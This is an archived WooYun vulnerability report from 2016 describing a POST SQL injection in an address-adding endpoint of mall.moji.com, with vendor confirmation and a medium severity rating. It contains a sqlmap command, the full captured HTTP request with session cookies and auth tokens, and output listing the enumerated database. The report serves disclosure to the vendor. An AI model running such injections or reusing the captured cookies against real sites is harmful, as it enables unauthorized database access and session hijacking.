乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-25: 细节已通知厂商并且等待厂商处理中 2016-04-27: 厂商已经确认,细节仅向厂商公开 2016-05-07: 细节向核心白帽子及相关领域专家公开 2016-05-17: 细节向普通白帽子公开 2016-05-27: 细节向实习白帽子公开 2016-06-11: 细节向公众公开
RT
post注入:sqlmap.py -r 1.txt --dbs -------------post数据包--------------------POST /myshop/addnewaddress HTTP/1.1Host: mall.moji.comProxy-Connection: keep-aliveContent-Length: 223Accept: application/jsonOrigin: http://mall.moji.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://mall.moji.com/appmall/addmyaddress/303/0/0//30912644Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: 95c3_f2f1_saltkey=BnP2jU2i; 95c3_f2f1_lastvisit=1461512525; _gat=1; 95c3_f2f1_ulastactivity=007bVQljxo3T7iodgIY6kXKWLQYtnR0mUrYaTjRxDXBEsuc%2F5AWU; 95c3_f2f1_auth=8d28nu8ZL8lUxTNB38jCZtcm814riUpex1CN9Ul0DpNNNq%2BiFUY6NhqEtVTuLmxSjjg911m6O1ZPqz9J5svuEgrfzA; 95c3_f2f1_nofavfid=1; 95c3_f2f1_home_diymode=1; 95c3_f2f1_sid=lcN6TE; 95c3_f2f1_lastact=1461516316%09home.php%09spacecp; 95c3_f2f1_noticeTitle=1; PHPSESSID=tuepaaqgk46jkqsudff50c16r6; channel=default; 303=%7B%22buy_way%22%3A%220%22%2C%22way_id%22%3A%220%22%7D; goods_id=303; sku_total=1; product_size01=%E9%93%B6%E8%89%B2%E9%95%9C%E7%89%87; product_num=1; moji_sessionid=AES6D7177316B516A7A39316874306E4763612F4E4759513D3D; snsid=30912644; good_data_product_no=%5B%22303%22%5D; good_data_name_json=%5B%223M%5Cu62a4%5Cu76ee%5Cu955c1791T%5C%2F1790G%22%5D; product_price_json=%5B%2269.00%22%5D; shop_price_json=%5B%2299.00%22%5D; goods_ids=303; __ads_session=KIROnPAYtgie93EAKwA=; _ga=GA1.2.1391845924.1461516131; _yd_=GA1.3.451698722.1461516330; Hm_lvt_4bd2403ae3a05b9a989b28908b95bef5=1461516331,1461516647; Hm_lpvt_4bd2403ae3a05b9a989b28908b95bef5=1461516652; province=undefined; city=undefined; county=undefinedusername=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&province=%E4%B8%8A%E6%B5%B7%E5%B8%82&city=%E4%B8%8A%E6%B5%B7%E5%B8%82&district=%E5%AE%9D%E5%B1%B1%E5%8C%BA&addressDetail=11111&postcode=111111&mobile=13444455555&userid=30912644
数据库
available databases [1]:[*] mojimall
过滤
危害等级:中
漏洞Rank:6
确认时间:2016-04-27 15:52
感谢提醒。
暂无